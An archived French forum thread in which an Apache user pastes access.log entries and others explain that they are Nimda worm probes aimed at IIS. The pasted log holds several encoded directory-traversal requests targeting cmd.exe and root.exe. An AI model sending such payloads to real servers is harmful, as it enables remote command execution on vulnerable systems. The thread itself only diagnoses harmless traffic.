apache: c koi c chose dans mon access.log

Recherche :

Mot : Pseudo : Filtrer
Bas de page
Auteur	Sujet : apache: c koi c chose dans mon access.log

fils_de_la_lumiere

depuis que j'ai installé apache j'ai continuelement (mon access.log fait 3mo alors que j'y accede que tres rarement) remplis de ce genre de ligne a des moments ou je c que personne que je connait utilise mon serveur

81.48.216.247 - - [26/Dec/2002:01:03:50 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:03:51 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:03:53 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:03:55 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:03:57 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:04:01 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:04:03 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:04:04 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:04:06 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:04:07 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:04:09 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:04:10 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:04:12 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 789
81.48.216.247 - - [26/Dec/2002:01:04:13 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 789
81.48.216.247 - - [26/Dec/2002:01:04:15 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 783
81.48.216.247 - - [26/Dec/2002:01:04:20 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 783

que signifient c lignes??

merci :jap:

Publicité

darklord

You're welcome

des failles de secu de IIS. Bien sur t'as pas IIS mais les petits malins qui attaqent ton IP ne s'en préoccupe pas

---------------
Just because you feel good does not make you right

samuelp

DarkLord a écrit :

des failles de secu de IIS. Bien sur t'as pas IIS mais les petits malins qui attaqent ton IP ne s'en préoccupe pas

Mais non c'est Nimda : Les utilisateurs de IIS ne s'en rendent meme pas compte qu'ils font chier le monde avec car les attaques Nimda ne font que propager ces commandes : C'est de l'insouciance a mon avis

darklord

You're welcome

samuelp a écrit :

je sais que c'est Nimda. Mais en attendant c'est un truc spécifique à IIS :kaola:

---------------
Just because you feel good does not make you right

Harkonnen

Modérateur
Un modo pour les bannir tous

DarkLord a écrit :

des failles de secu de IIS. Bien sur t'as pas IIS mais les petits malins qui attaqent ton IP ne s'en préoccupe pas

c pas plutot Nimda qui fait chier son monde :??:

edit: grilled again, et par samuelp en plus [:totoz]

Message édité par Harkonnen le 26-12-2002 à 12:29:36

---------------
J'ai un string dans l'array (Paris Hilton)

darklord

You're welcome

---------------
Just because you feel good does not make you right

Harkonnen

Modérateur
Un modo pour les bannir tous

DarkLord a écrit :

[:tapai]

---------------
J'ai un string dans l'array (Paris Hilton)

fils_de_la_lumiere

mouais mais une question: comment on t'il eu mon ip?

drasche

Pas sûr qu'ils aient eu, il suffit juste qu'ils essaient tout un range d'ip "juste pour voir". J'ai eu ces choses là aussi dans mon access.log. Mais qui n'en a jamais eu?

---------------
Whichever format the fan may want to listen is fine with us – vinyl, wax cylinders, shellac, 8-track, iPod, cloud storage, cranial implants – just as long as it’s loud and rockin' (Billy Gibbons, ZZ Top)

fils_de_la_lumiere

n'empeche que c'est hyper frequent genre plusieurs fois par jour voir par heure

Publicité

kadreg

profil: Utilisateur

fils_de_la_lumiere a écrit :

n'empeche que c'est hyper frequent genre plusieurs fois par jour voir par heure

C'est plus calme maintenant. Au plus fort de l'infection, j'en avais une rafale toutes les 5 minutes.

--greg--

ouais j'en ai tjs 1 à 3 par jour :sweat:

---------------
#19b | Mardi 18 Février 2003 - nous fêtons les Bernadette | contre le fleur icq!

HappyHarry

--greg-- a écrit :

ouais j'en ai tjs 1 à 3 par jour :sweat:

environ 400 par semaine

--greg--

HappyHarry a écrit :

environ 400 par semaine

qd je dis 1à3, je parle pas de hits mais d'ip differents hein

---------------
#19b | Mardi 18 Février 2003 - nous fêtons les Bernadette | contre le fleur icq!

drasche

--greg-- a écrit :

qd je dis 1à3, je parle pas de hits mais d'ip differents hein

tu fais bien de préciser, on avait tous mal compris [:greg2]

darklord

You're welcome

Drasche a écrit :

tu fais bien de préciser, on avait tous mal compris [:greg2]

:lol:

HappyHarry

raph93 a écrit :

blablabla

on s'en fout

--greg--

HappyHarry a écrit :

on s'en fout

:??:

---------------
#19b | Mardi 18 Février 2003 - nous fêtons les Bernadette | contre le fleur icq!

+yann

Ya pas un petit script qui capable d'envoyer un net send IP "vous avez le virus nimda sur votre system"

a chaque tentative de "hack"?

darklord

You're welcome

+yann a écrit :

Ya pas un petit script qui capable d'envoyer un net send IP "vous avez le virus nimda sur votre system"

a chaque tentative de "hack"?

ca serait cool tiens [:ddr555]

darklord

You're welcome

--greg-- a écrit :

:??:

il a surment effacé son msg entre temps

--greg--

DarkLord a écrit :

:??:

---------------
#19b | Mardi 18 Février 2003 - nous fêtons les Bernadette | contre le fleur icq!

darklord

You're welcome

--greg-- a écrit :

:??:

mauvaise manip je viens de le voir

HappyHarry

--greg-- a écrit :

:??:

le gars avait balancé un log de je sais pas combien de lignes juste pour dire que lui aussi en avait, c t super intéressant :sarcastic:

--greg--

:lol:

---------------
#19b | Mardi 18 Février 2003 - nous fêtons les Bernadette | contre le fleur icq!

lorill

+yann a écrit :

Ya pas un petit script qui capable d'envoyer un net send IP "vous avez le virus nimda sur votre system"

a chaque tentative de "hack"?

y'en avait un, ca doit se retrouver.

raph93

HappyHarry a écrit :

le gars avait balancé un log de je sais pas combien de lignes juste pour dire que lui aussi en avait, c t super intéressant :sarcastic:

---------------
Nothing can stop me, I'm never satisfied, I take what i want, refuse to be denied...

Publicité

FORUM HardWare.fr

Programmation

Divers

apache: c koi c chose dans mon access.log

Sujets relatifs
ACCESS 2000 et OUTLOOK 2000	Pb Access
[VBA Access] vous connaitriez pas un site bien pour apprendre	[Access] Venez m'aider !
[ACCESS] Problème de requette	Poukoi "./" marche pas dans Access pour le rep courant ??
[SGBD ACCESS] Executer plusieurs requettes SQL en un seul coup	Requête action sous Access 2002
Ouvrir une page de cadre avec autre chose que les pages par défaut ..	[php] Microsoft Outlook Web Access - Connexion ???
Plus de sujets relatifs à : apache: c koi c chose dans mon access.log

Page générée en 0.112 secondes